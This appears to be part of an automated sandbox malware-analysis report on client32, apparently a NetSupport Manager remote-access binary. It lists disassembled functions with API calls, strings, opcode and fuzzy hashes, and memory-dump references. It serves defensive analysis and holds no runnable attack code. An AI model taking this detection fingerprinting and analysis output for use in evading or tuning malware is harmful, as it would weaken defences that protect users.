                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strtok
                                                                                                                                        • String ID: ,;$..\ctl32\util.cpp
                                                                                                                                        • API String ID: 1675499619-1361470564
                                                                                                                                        • Opcode ID: ce93753942c859c59d7e501bea822f3ba273834b7b1ebd9389ea84338f4515ed
                                                                                                                                        • Instruction ID: 3a21d0ed89595bcd9ff1dbda4637a27748d6098ff4eb0d40b20cf0eb11d9c026
                                                                                                                                        • Opcode Fuzzy Hash: ce93753942c859c59d7e501bea822f3ba273834b7b1ebd9389ea84338f4515ed
                                                                                                                                        • Instruction Fuzzy Hash: 770128B7B006473BD3011B7E6D40B9AF7AC8B81A58F184121FD58D7382EA21F909C2A6
                                                                                                                                        Function 688F8B50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memsetwsprintf
                                                                                                                                        • String ID: %s_%d$Gateway_Name
                                                                                                                                        • API String ID: 1984265443-207007254
                                                                                                                                        • Opcode ID: a74a1d57439ddbed988cb18d889fc1e21022baec6c35d25c5a189e0da4ed6639
                                                                                                                                        • Instruction ID: d7762130da8b14963a83fda808a80b0ed222207d86989c4bd518d885448467e2
                                                                                                                                        • Opcode Fuzzy Hash: a74a1d57439ddbed988cb18d889fc1e21022baec6c35d25c5a189e0da4ed6639
                                                                                                                                        • Instruction Fuzzy Hash: 290147B5A0420CAFDB20DB58CC41EBE7378EB86344F804454FD559B240D630AE15C7A5
                                                                                                                                        Function 688FC320 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FC36A
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: FLG=%d$ID=%d$UID=%s
                                                                                                                                        • API String ID: 3180605519-3107437138
                                                                                                                                        • Opcode ID: 88fa39cc39f654148f2254af9d5d42613faaad00523ca066e27421e83e05c17c
                                                                                                                                        • Instruction ID: ed3f9589829c77c86b4d4ce3fdb2ec37a9544f08521c39ee9e4300163fcdc89a
                                                                                                                                        • Opcode Fuzzy Hash: 88fa39cc39f654148f2254af9d5d42613faaad00523ca066e27421e83e05c17c
                                                                                                                                        • Instruction Fuzzy Hash: 04F062BA5042297BD7019A2ADC40FABB76CEF961A8F808411FC2897652DB35E611C7F4
                                                                                                                                        Function 1105D140 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetPropA.USER32(?,NSMCobrProxy), ref: 1105D150
                                                                                                                                        • DefWindowProcA.USER32(?,?,?,?), ref: 1105D168
                                                                                                                                        • DestroyWindow.USER32(?), ref: 1105D17C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$DestroyProcProp
                                                                                                                                        • String ID: NSMCobrProxy
                                                                                                                                        • API String ID: 3223085693-3894016192
                                                                                                                                        • Opcode ID: 8721c0f0a996185e474c3a7b3ab1b583a274be32cc358fa53e7d83e36b3b3593
                                                                                                                                        • Instruction ID: 9c147f281cd98425ab9aa3ac9592e9bc4489785d07665bec5873f0907dac8d8d
                                                                                                                                        • Opcode Fuzzy Hash: 8721c0f0a996185e474c3a7b3ab1b583a274be32cc358fa53e7d83e36b3b3593
                                                                                                                                        • Instruction Fuzzy Hash: F9F0A0367011287BE7019E49DC84DFF7BACDBC6362B008066FA02C3241D7709812D7B1
                                                                                                                                        Function 688F82B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688F82B5
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688F82C5
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 68911975
                                                                                                                                          • Part of subcall function 68911960: __CxxThrowException@8.LIBCMT ref: 6891198A
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 6891199B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 1823113695-4289949731
                                                                                                                                        • Opcode ID: 5a521ee67416e1e1742814ab4c76230136bb4d6a93405c7bbc63c91ab2605f3d
                                                                                                                                        • Instruction ID: 66550018202f6236a4d174728145e983e464bf66765e3becb3b6be7de07aba2d
                                                                                                                                        • Opcode Fuzzy Hash: 5a521ee67416e1e1742814ab4c76230136bb4d6a93405c7bbc63c91ab2605f3d
                                                                                                                                        • Instruction Fuzzy Hash: D1C08C7E84C22C3B821862EC7C05CAE335D5BB3164BD814107EA992900FB11E36081B3
                                                                                                                                        Function 1101D100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 1101D12F
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 1101D136
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                        • API String ID: 1319256379-1986719024
                                                                                                                                        • Opcode ID: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                                        • Instruction ID: 4e2be1340c0eb87c864e4721684ff6510800268e2acfe58ec4bc6308307db221
                                                                                                                                        • Opcode Fuzzy Hash: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                                        • Instruction Fuzzy Hash: 4AE0867A910329BFC310EE61DC89FDBF7ACDB45754F10C429FA2947200D674E94087A1
                                                                                                                                        Function 688F46C0 Relevance: 6.1, APIs: 4, Instructions: 143sleeptimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM(?,00000000,?,?,?,?,688F9C3B,?,00000001), ref: 688F46DE
                                                                                                                                        • EnterCriticalSection.KERNEL32(00000008,?,?,?,688F9C3B,?,00000001), ref: 688F46EA
                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000008,?,688F9C3B,?,?,?,?,688F9C3B,?,00000001), ref: 688F47DF
                                                                                                                                        • Sleep.KERNEL32(?,?,?,?,688F9C3B), ref: 688F4814
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeaveSleepTimetime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3384934701-0
                                                                                                                                        • Opcode ID: 48349bb90ff759d41a9e0e300b8b932ea88695ffcf38c31a0cce36bc225f1f0b
                                                                                                                                        • Instruction ID: 663657b3ebe992c7dbba8842ab0f9ac201b477704e8f75c5c4d31dc5e406b5a6
                                                                                                                                        • Opcode Fuzzy Hash: 48349bb90ff759d41a9e0e300b8b932ea88695ffcf38c31a0cce36bc225f1f0b
                                                                                                                                        • Instruction Fuzzy Hash: 5F519136A10105CFCB24CF28C5D4969B7A5FFC939079586BADC158B61ADB30E842CB90
                                                                                                                                        Function 6890D6B0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __strdup.LIBCMT ref: 6890D6DC
                                                                                                                                        • _free.LIBCMT ref: 6890D7DE
                                                                                                                                          • Part of subcall function 6890BA20: __strdup.LIBCMT ref: 6890BA3A
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890D806
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890D81B
                                                                                                                                          • Part of subcall function 6890CE00: std::_Xinvalid_argument.LIBCPMT ref: 6890CE20
                                                                                                                                          • Part of subcall function 6890CE00: _memmove.LIBCMT ref: 6890CEA7
                                                                                                                                          • Part of subcall function 6890CE00: _memmove.LIBCMT ref: 6890CECB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __strdup_memmove$Exception@8ThrowXinvalid_argument_freestd::_std::exception::exception
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 837426990-0
                                                                                                                                        • Opcode ID: 3b71c26b96b2363437a46fe60c4e938faa918cbf6e4eb6a60316ce32be5d8113
                                                                                                                                        • Instruction ID: cb94b4fa81e9a9fc1d65e2118600b767440f3c3f6f4d586709987e5f00b2abfe
                                                                                                                                        • Opcode Fuzzy Hash: 3b71c26b96b2363437a46fe60c4e938faa918cbf6e4eb6a60316ce32be5d8113
                                                                                                                                        • Instruction Fuzzy Hash: 594192B5904249AFCB10DFACC880BEEB7F9EF58218F50461DE85697341E730EA44CBA1
                                                                                                                                        Function 6891EB03 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2782032738-0
                                                                                                                                        • Opcode ID: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
                                                                                                                                        • Instruction ID: ee8fa68e61d52c8a0c0c3c7203026a292933cf6688e1c965656d285cd95a82a2
                                                                                                                                        • Opcode Fuzzy Hash: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
                                                                                                                                        • Instruction Fuzzy Hash: 5E41F431B4C70DDBDB158FAA8C446AEB7B9AFC0768FA44529D4F697980D730EA41CB00
                                                                                                                                        Function 68910080 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 689100D2
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 689100E7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        • Opcode ID: ec9b70993cb2d0a6bb45ca9b3efb7c88199efff711f0d9fb63179f65e7dd12f9
                                                                                                                                        • Instruction ID: 561afb55722fa635ff8f1a0d37e46ad69a28cc643e9fee5e157e526a11e3eec4
                                                                                                                                        • Opcode Fuzzy Hash: ec9b70993cb2d0a6bb45ca9b3efb7c88199efff711f0d9fb63179f65e7dd12f9
                                                                                                                                        • Instruction Fuzzy Hash: A741D3B990821C9FC714CF98C940BAAB7F8FB58204F40455EE85A97741E771FA04CBA1
                                                                                                                                        Function 68900B00 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68900BA3
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68900BB8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        • Opcode ID: 74d2518d5993c3c46b97e2a4eb79a9f608d988a6a9910c37a34de59e85a7fcb5
                                                                                                                                        • Instruction ID: c6994e6697eff38264024b36a882bb853818c56faf13a51682d8c456accb625d
                                                                                                                                        • Opcode Fuzzy Hash: 74d2518d5993c3c46b97e2a4eb79a9f608d988a6a9910c37a34de59e85a7fcb5
                                                                                                                                        • Instruction Fuzzy Hash: 3D3181B5900618AFCB14DF99C8409AFFBF8FF98614F50862EE55593700E774AA04CB91
                                                                                                                                        Function 6890F9A0 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890F9F9
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890FA0E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
